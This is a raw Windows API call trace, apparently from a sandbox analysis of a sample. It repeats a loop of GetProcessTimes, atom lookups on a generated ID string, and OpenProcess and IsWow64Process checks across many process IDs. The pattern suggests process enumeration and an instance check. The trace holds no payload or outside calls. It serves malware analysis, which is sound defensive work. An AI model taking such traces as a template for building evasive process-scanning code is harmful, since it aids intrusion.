	[0088.773] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0088.773] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0088.773] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.773] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0088.773] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.773] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0088.773] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0088.773] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0088.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0088.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0088.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0088.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0088.774] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.774] CloseHandle (hObject=0x20c) returned 1
	[0088.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0088.774] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.774] CloseHandle (hObject=0x20c) returned 1
	[0088.844] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0088.844] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0088.844] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0088.844] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0088.844] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0088.844] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0088.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0088.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0088.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0088.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0088.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0088.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0088.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0088.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0088.846] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0088.846] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0088.846] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0088.846] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0088.846] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0088.846] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.846] CloseHandle (hObject=0x20c) returned 1
	[0088.846] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0088.846] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0088.846] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0088.847] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.847] CloseHandle (hObject=0x20c) returned 1
	[0088.847] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0088.847] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0088.847] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.847] CloseHandle (hObject=0x20c) returned 1
	[0088.847] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0088.847] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.847] CloseHandle (hObject=0x20c) returned 1
	[0088.847] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0088.847] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.847] CloseHandle (hObject=0x20c) returned 1
	[0088.847] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0088.848] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.848] CloseHandle (hObject=0x20c) returned 1
	[0088.848] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0088.848] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.848] CloseHandle (hObject=0x20c) returned 1
	[0088.848] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0088.848] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.848] CloseHandle (hObject=0x20c) returned 1
	[0088.848] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0088.848] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0088.848] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.848] CloseHandle (hObject=0x20c) returned 1
	[0088.848] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0088.848] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.848] CloseHandle (hObject=0x20c) returned 1
	[0088.848] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0088.849] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.849] CloseHandle (hObject=0x20c) returned 1
	[0088.849] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0088.849] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.849] CloseHandle (hObject=0x20c) returned 1
	[0088.849] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0088.849] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.849] CloseHandle (hObject=0x20c) returned 1
	[0088.849] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0088.849] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.849] CloseHandle (hObject=0x20c) returned 1
	[0088.849] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0088.849] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.849] CloseHandle (hObject=0x20c) returned 1
	[0088.849] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0088.849] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.850] CloseHandle (hObject=0x20c) returned 1
	[0088.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0088.850] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.850] CloseHandle (hObject=0x20c) returned 1
	[0088.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0088.850] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.850] CloseHandle (hObject=0x20c) returned 1
	[0088.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0088.850] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.850] CloseHandle (hObject=0x20c) returned 1
	[0088.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0088.850] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.850] CloseHandle (hObject=0x20c) returned 1
	[0088.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0088.850] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.850] CloseHandle (hObject=0x20c) returned 1
	[0088.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0088.851] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.851] CloseHandle (hObject=0x20c) returned 1
	[0088.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0088.851] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.851] CloseHandle (hObject=0x20c) returned 1
	[0088.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0088.851] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.851] CloseHandle (hObject=0x20c) returned 1
	[0088.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0088.851] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.851] CloseHandle (hObject=0x20c) returned 1
	[0088.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0088.851] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.851] CloseHandle (hObject=0x20c) returned 1
	[0088.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0088.851] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.852] CloseHandle (hObject=0x20c) returned 1
	[0088.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0088.852] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.852] CloseHandle (hObject=0x20c) returned 1
	[0088.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0088.852] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.852] CloseHandle (hObject=0x20c) returned 1
	[0088.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0088.852] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.852] CloseHandle (hObject=0x20c) returned 1
	[0088.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0088.852] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.852] CloseHandle (hObject=0x20c) returned 1
	[0088.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0088.853] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.853] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0088.853] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0088.853] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0088.853] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.853] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0088.853] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.854] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0088.854] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0088.854] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0088.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0088.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0088.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0088.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0088.854] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.854] CloseHandle (hObject=0x20c) returned 1
	[0088.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0088.854] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.854] CloseHandle (hObject=0x20c) returned 1
	[0088.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0088.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0088.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0088.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0088.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0088.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0088.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0088.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0088.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0088.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0088.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0088.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0088.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0088.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0088.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0088.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0088.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0088.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0088.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0088.931] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.931] CloseHandle (hObject=0x20c) returned 1
	[0088.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0088.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0088.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0088.931] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.932] CloseHandle (hObject=0x20c) returned 1
	[0088.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0088.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0088.932] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.932] CloseHandle (hObject=0x20c) returned 1
	[0088.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0088.932] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.932] CloseHandle (hObject=0x20c) returned 1
	[0088.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0088.932] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.932] CloseHandle (hObject=0x20c) returned 1
	[0088.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0088.932] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.932] CloseHandle (hObject=0x20c) returned 1
	[0088.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0088.933] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.933] CloseHandle (hObject=0x20c) returned 1
	[0088.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0088.933] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.933] CloseHandle (hObject=0x20c) returned 1
	[0088.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0088.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0088.933] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.933] CloseHandle (hObject=0x20c) returned 1
	[0088.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0088.933] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.933] CloseHandle (hObject=0x20c) returned 1
	[0088.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0088.933] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.933] CloseHandle (hObject=0x20c) returned 1
	[0088.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0088.934] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.934] CloseHandle (hObject=0x20c) returned 1
	[0088.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0088.934] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.934] CloseHandle (hObject=0x20c) returned 1
	[0088.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0088.934] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.934] CloseHandle (hObject=0x20c) returned 1
	[0088.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0088.934] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.934] CloseHandle (hObject=0x20c) returned 1
	[0088.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0088.934] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.934] CloseHandle (hObject=0x20c) returned 1
	[0088.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0088.935] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.935] CloseHandle (hObject=0x20c) returned 1
	[0088.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0088.935] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.935] CloseHandle (hObject=0x20c) returned 1
	[0088.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0088.935] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.935] CloseHandle (hObject=0x20c) returned 1
	[0088.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0088.935] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.935] CloseHandle (hObject=0x20c) returned 1
	[0088.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0088.935] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.935] CloseHandle (hObject=0x20c) returned 1
	[0088.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0088.935] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.935] CloseHandle (hObject=0x20c) returned 1
	[0088.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0088.936] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.936] CloseHandle (hObject=0x20c) returned 1
	[0088.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0088.936] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.936] CloseHandle (hObject=0x20c) returned 1
	[0088.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0088.936] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.936] CloseHandle (hObject=0x20c) returned 1
	[0088.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0088.936] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.936] CloseHandle (hObject=0x20c) returned 1
	[0088.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0088.936] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.936] CloseHandle (hObject=0x20c) returned 1
	[0088.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0088.937] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.937] CloseHandle (hObject=0x20c) returned 1
	[0088.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0088.937] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.937] CloseHandle (hObject=0x20c) returned 1
	[0088.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0088.937] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.937] CloseHandle (hObject=0x20c) returned 1
	[0088.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0088.937] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.937] CloseHandle (hObject=0x20c) returned 1
	[0088.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0088.938] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.938] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0088.938] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0088.938] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0088.938] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.938] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0088.938] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.939] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0088.939] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0088.939] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0088.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0088.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0088.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0088.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0088.939] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.939] CloseHandle (hObject=0x20c) returned 1
	[0088.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0088.939] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.940] CloseHandle (hObject=0x20c) returned 1
